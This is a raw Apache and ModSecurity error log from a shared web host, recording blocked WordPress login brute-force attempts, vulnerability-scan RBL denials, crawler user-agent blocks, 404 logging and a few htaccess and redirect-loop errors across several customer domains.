[Tue May 26 20:05:59.255960 2026] [security2:error] [pid 112029:tid 112249] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvzqFW0C-ajaCsyFdMWgAAAWQ"]
[Tue May 26 20:06:00.897824 2026] [security2:error] [pid 112029:tid 112078] [remote 18.219.113.49:46936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWv0KFW0C-ajaCsyFdMiAABHDA"]
[Tue May 26 20:06:01.160056 2026] [security2:error] [pid 112029:tid 112079] [remote 18.219.113.49:46936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.113.219.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWv0aFW0C-ajaCsyFdMlgABdTE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:06:01.576666 2026] [security2:error] [pid 113091:tid 113341] [client 3.137.190.147:45076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.samayikprasanga.in"] [uri "/sellers.json"] [unique_id "ahWv0aPxBGSmlFNOy6pbnAAAAow"]
[Tue May 26 20:06:01.647991 2026] [security2:error] [pid 113091:tid 113222] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv0aPxBGSmlFNOy6pbjgAAAhU"]
[Tue May 26 20:06:02.087586 2026] [security2:error] [pid 112029:tid 112075] [remote 46.20.146.46:60536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWv0aFW0C-ajaCsyFdMpQABfS0"]
[Tue May 26 20:06:03.033252 2026] [security2:error] [pid 112029:tid 112086] [remote 46.20.146.46:60536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWv0qFW0C-ajaCsyFdMvAABRjg"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 20:06:03.307095 2026] [security2:error] [pid 112029:tid 112190] [client 51.68.32.127:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWv06FW0C-ajaCsyFdMwgAAASk"], referer: https://www.anujtradingco.com/
[Tue May 26 20:06:04.044401 2026] [security2:error] [pid 113091:tid 113259] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv06PxBGSmlFNOy6pb3gAAAjo"]
[Tue May 26 20:06:04.322554 2026] [security2:error] [pid 113091:tid 113231] [client 51.68.32.127:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWv1KPxBGSmlFNOy6pb-QAAAh4"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1264128&moderation-hash=53cb562d88264cf6f2dea3bbdd74776a
[Tue May 26 20:06:06.075660 2026] [security2:error] [pid 113091:tid 113221] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv1aPxBGSmlFNOy6pcGwAAAhQ"]
[Tue May 26 20:06:08.108794 2026] [security2:error] [pid 112029:tid 112215] [client 45.147.11.152:21591] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWv16FW0C-ajaCsyFdNDQAAAUI"], referer: https://anujtradingco.com
[Tue May 26 20:06:08.117168 2026] [security2:error] [pid 113091:tid 113159] [remote 216.73.216.30:60493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWv2KPxBGSmlFNOy6pccQACkUM"]
[Tue May 26 20:06:09.263667 2026] [security2:error] [pid 113091:tid 113259] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv2KPxBGSmlFNOy6pciAAAAjo"]
[Tue May 26 20:06:09.897530 2026] [security2:error] [pid 112029:tid 112212] [client 173.252.82.4:53316] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahWv2KFW0C-ajaCsyFdNHwABP0g"]
[Tue May 26 20:06:10.660441 2026] [core:crit] [pid 113091:tid 113333] (13)Permission denied: [client 207.46.13.153:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 20:06:10.845840 2026] [security2:error] [pid 113091:tid 113181] [remote 211.23.68.235:43779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWv2qPxBGSmlFNOy6pc0AACFlk"]
[Tue May 26 20:06:10.972967 2026] [core:crit] [pid 112029:tid 112281] (13)Permission denied: [client 207.46.13.153:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 20:06:11.698454 2026] [security2:error] [pid 112029:tid 112184] [client 85.208.96.212:13376] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWv26FW0C-ajaCsyFdNZQAAASM"]
[Tue May 26 20:06:11.698583 2026] [security2:error] [pid 112029:tid 112184] [client 85.208.96.212:13376] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWv26FW0C-ajaCsyFdNZQAAASM"]
[Tue May 26 20:06:13.771149 2026] [core:error] [pid 113091:tid 113266] [client 205.210.31.40:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 20:06:13.771172 2026] [core:error] [pid 113091:tid 113266] [client 205.210.31.40:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 20:06:14.157743 2026] [security2:error] [pid 113091:tid 113222] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv3aPxBGSmlFNOy6pdIgAAAhU"]
[Tue May 26 20:06:15.089181 2026] [security2:error] [pid 112029:tid 112212] [client 178.20.45.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWv36FW0C-ajaCsyFdNrAAAAT8"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1219941&moderation-hash=384eb28b38d442b9c6c84e0302d12c8b
[Tue May 26 20:06:15.886444 2026] [security2:error] [pid 112029:tid 112122] [remote 195.201.169.143:52674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 143.169.201.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWv36FW0C-ajaCsyFdNtwABUlw"]
[Tue May 26 20:06:15.967259 2026] [security2:error] [pid 113091:tid 113315] [client 178.20.45.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWv36PxBGSmlFNOy6pdbAAAAnI"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1219941&moderation-hash=384eb28b38d442b9c6c84e0302d12c8b
[Tue May 26 20:06:16.335927 2026] [security2:error] [pid 112029:tid 112237] [client 173.239.254.131:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWv36FW0C-ajaCsyFdNsQABWFo"]
[Tue May 26 20:06:16.590246 2026] [security2:error] [pid 112029:tid 112124] [remote 74.91.224.220:38808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWv4KFW0C-ajaCsyFdNvwABZ14"]
[Tue May 26 20:06:16.637556 2026] [security2:error] [pid 112029:tid 112118] [remote 195.201.169.143:52674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 143.169.201.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWv4KFW0C-ajaCsyFdNxAABYVg"], referer: https://preetishah.com/wp-login.php
[Tue May 26 20:06:16.864787 2026] [security2:error] [pid 113091:tid 113223] [client 123.22.6.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv4KPxBGSmlFNOy6pdhAAAAhY"]
[Tue May 26 20:06:17.188843 2026] [security2:error] [pid 112029:tid 112136] [remote 74.91.224.220:38808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWv4aFW0C-ajaCsyFdNzwABIGo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:06:17.542353 2026] [security2:error] [pid 112029:tid 112195] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv4aFW0C-ajaCsyFdNzgAAAS4"]
[Tue May 26 20:06:19.300674 2026] [security2:error] [pid 112029:tid 112183] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv4qFW0C-ajaCsyFdN_QAAASI"]
[Tue May 26 20:06:20.135942 2026] [security2:error] [pid 112029:tid 112229] [client 183.215.23.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWv5KFW0C-ajaCsyFdOEgAAAVA"], referer: https://www.anujtradingco.com/
[Tue May 26 20:06:20.647352 2026] [security2:error] [pid 113091:tid 113139] [remote 216.73.216.30:60493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWv5KPxBGSmlFNOy6peCwACkS8"]
[Tue May 26 20:06:21.025841 2026] [security2:error] [pid 112029:tid 112123] [remote 121.200.216.55:60472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWv5KFW0C-ajaCsyFdOJQABKF0"]
[Tue May 26 20:06:21.225697 2026] [security2:error] [pid 112029:tid 112174] [client 104.28.214.117:33399] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "midrivermarina.com"] [uri "/ms-themes.php"] [unique_id "ahWv5aFW0C-ajaCsyFdOLAAAARk"]
[Tue May 26 20:06:21.399584 2026] [security2:error] [pid 112029:tid 112207] [client 104.28.214.117:33407] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "midrivermarina.com"] [uri "/chosen.php"] [unique_id "ahWv5aFW0C-ajaCsyFdOMAAAATo"]
[Tue May 26 20:06:21.926102 2026] [security2:error] [pid 112029:tid 112203] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv5aFW0C-ajaCsyFdOMwAAATY"]
[Tue May 26 20:06:23.137322 2026] [security2:error] [pid 112029:tid 112142] [remote 54.38.29.86:45062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWv5qFW0C-ajaCsyFdOWgABLnA"]
[Tue May 26 20:06:23.710311 2026] [security2:error] [pid 113091:tid 113145] [remote 208.68.37.246:48548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.37.68.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWv56PxBGSmlFNOy6peTgACTDU"]
[Tue May 26 20:06:23.902083 2026] [security2:error] [pid 113091:tid 113118] [remote 216.73.216.30:60493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWv56PxBGSmlFNOy6peWAACkRo"]
[Tue May 26 20:06:24.187394 2026] [security2:error] [pid 113091:tid 113265] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv56PxBGSmlFNOy6peVQAAAkA"]
[Tue May 26 20:06:24.692596 2026] [security2:error] [pid 113091:tid 113157] [remote 208.68.37.246:48548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.37.68.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWv6KPxBGSmlFNOy6peYQACHEE"], referer: https://kurgu-afrika.com/wp-login.php
[Tue May 26 20:06:25.635178 2026] [security2:error] [pid 112029:tid 112031] [remote 69.63.184.15:40588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.184.63.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ecosol.plus"] [uri "/esplus/usuarios/registro.php"] [unique_id "ahWv6aFW0C-ajaCsyFdOswABGwE"]
[Tue May 26 20:06:27.325455 2026] [security2:error] [pid 113091:tid 113337] [client 183.215.23.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWv66PxBGSmlFNOy6penwAAAog"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1224415&moderation-hash=a121a9299c9143219a029037e485b5f9
[Tue May 26 20:06:28.135010 2026] [security2:error] [pid 113091:tid 113347] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv66PxBGSmlFNOy6pepwAAApI"]
[Tue May 26 20:06:28.582759 2026] [security2:error] [pid 113091:tid 113343] [client 104.28.214.117:64986] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "midrivermarina.com"] [uri "/file.php"] [unique_id "ahWv7KPxBGSmlFNOy6peswAAAo4"]
[Tue May 26 20:06:28.947666 2026] [security2:error] [pid 112029:tid 112034] [remote 173.252.82.14:37432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.82.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ecosol.plus"] [uri "/esplus/usuarios/registro.php"] [unique_id "ahWv7KFW0C-ajaCsyFdO0QABTgQ"]
[Tue May 26 20:06:29.387712 2026] [security2:error] [pid 113091:tid 113266] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv7KPxBGSmlFNOy6peuAAAAkE"]
[Tue May 26 20:06:30.500538 2026] [security2:error] [pid 112029:tid 112039] [remote 69.171.234.19:58160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.234.171.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ecosol.plus"] [uri "/esplus/usuarios/registro.php"] [unique_id "ahWv7qFW0C-ajaCsyFdO3QABcQk"]
[Tue May 26 20:06:31.872457 2026] [security2:error] [pid 112029:tid 112163] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv76FW0C-ajaCsyFdO9QAAAQ4"]
[Tue May 26 20:06:32.361033 2026] [security2:error] [pid 113091:tid 113180] [remote 198.244.168.197:59040] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "bosscoirs.com"] [uri "/robots.txt"] [unique_id "ahWv8KPxBGSmlFNOy6pe6AACglg"]
[Tue May 26 20:06:32.361214 2026] [security2:error] [pid 113091:tid 113331] [client 198.244.168.197:59040] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bosscoirs.com"] [uri "/robots.txt"] [unique_id "ahWv8KPxBGSmlFNOy6pe6AACglg"]
[Tue May 26 20:06:33.561757 2026] [security2:error] [pid 113091:tid 113258] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv8aPxBGSmlFNOy6pe9wAAAjk"]
[Tue May 26 20:06:33.821658 2026] [security2:error] [pid 112029:tid 112069] [remote 15.235.98.43:38286] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "bosscoirs.com"] [uri "/"] [unique_id "ahWv8aFW0C-ajaCsyFdPKAABXSc"]
[Tue May 26 20:06:33.821810 2026] [security2:error] [pid 112029:tid 112242] [client 15.235.98.43:38286] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bosscoirs.com"] [uri "/"] [unique_id "ahWv8aFW0C-ajaCsyFdPKAABXSc"]
[Tue May 26 20:06:36.294825 2026] [security2:error] [pid 113091:tid 113218] [remote 78.142.18.172:52314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWv9KPxBGSmlFNOy6pfFwACdn4"]
[Tue May 26 20:06:36.390677 2026] [security2:error] [pid 113091:tid 113178] [remote 198.38.81.14:47268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.81.38.198.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWv9KPxBGSmlFNOy6pfGAACh1Y"]
[Tue May 26 20:06:36.548608 2026] [security2:error] [pid 113091:tid 113179] [remote 78.142.18.172:52314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWv9KPxBGSmlFNOy6pfHAACGVc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:06:37.101665 2026] [security2:error] [pid 113091:tid 113283] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv9KPxBGSmlFNOy6pfIQAAAlI"]
[Tue May 26 20:06:38.698025 2026] [security2:error] [pid 113091:tid 113169] [remote 121.200.216.55:60308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWv9qPxBGSmlFNOy6pfQwACPU0"]
[Tue May 26 20:06:39.159696 2026] [security2:error] [pid 113091:tid 113249] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv9qPxBGSmlFNOy6pfRwAAAjA"]
[Tue May 26 20:06:41.066918 2026] [security2:error] [pid 113091:tid 113345] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv-KPxBGSmlFNOy6pfgAAAApA"]
